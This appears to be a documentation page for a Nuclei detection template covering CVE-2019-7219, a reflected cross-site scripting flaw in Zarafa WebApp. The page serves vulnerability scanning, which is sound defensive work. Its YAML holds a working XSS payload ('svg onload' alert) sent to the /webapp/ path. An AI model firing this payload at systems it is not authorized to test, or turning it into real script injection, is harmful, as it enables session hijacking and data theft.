Zarafa WebApp <=2.0.1.47791 - Cross-Site Scripting
ID: CVE-2019-7219
Severity: medium
Author: pdteam
Tags: cve,cve2019,zarafa,xss
Description
Section titled “Description”Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
YAML Source
Section titled “YAML Source”id: CVE-2019-7219
info: name: Zarafa WebApp <=2.0.1.47791 - Cross-Site Scripting author: pdteam severity: medium description: | Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: This is a discontinued product. The issue was fixed in later versions. However, some former Zarafa WebApp customers use the related Kopano product instead. reference: - https://github.com/verifysecurity/CVE-2019-7219 - https://stash.kopano.io/repos?visibility=public - https://nvd.nist.gov/vuln/detail/CVE-2019-7219 - https://github.com/Elsfa7-110/kenzer-templates - https://github.com/merlinepedra25/nuclei-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-7219 cwe-id: CWE-79 epss-score: 0.00113 epss-percentile: 0.44665 cpe: cpe:2.3:a:zarafa:webaccess:7.2.0-48204:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zarafa product: webaccess tags: cve,cve2019,zarafa,xss
http: - method: GET path: - '{{BaseURL}}/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(/xss/)%3E'
matchers-condition: and matchers: - type: word part: body words: - "<svg/onload=alert(/xss/)>"
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 4a0a0047304502206c83e99e302ee9f725a1046abd351e53985a2b1f06cc4c1f7f6b328e0286038d022100eabb4917a2d588ea6de2684a3a2c94e610ec16b7726bdc42010f16f91d1a3401:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-7219.yaml"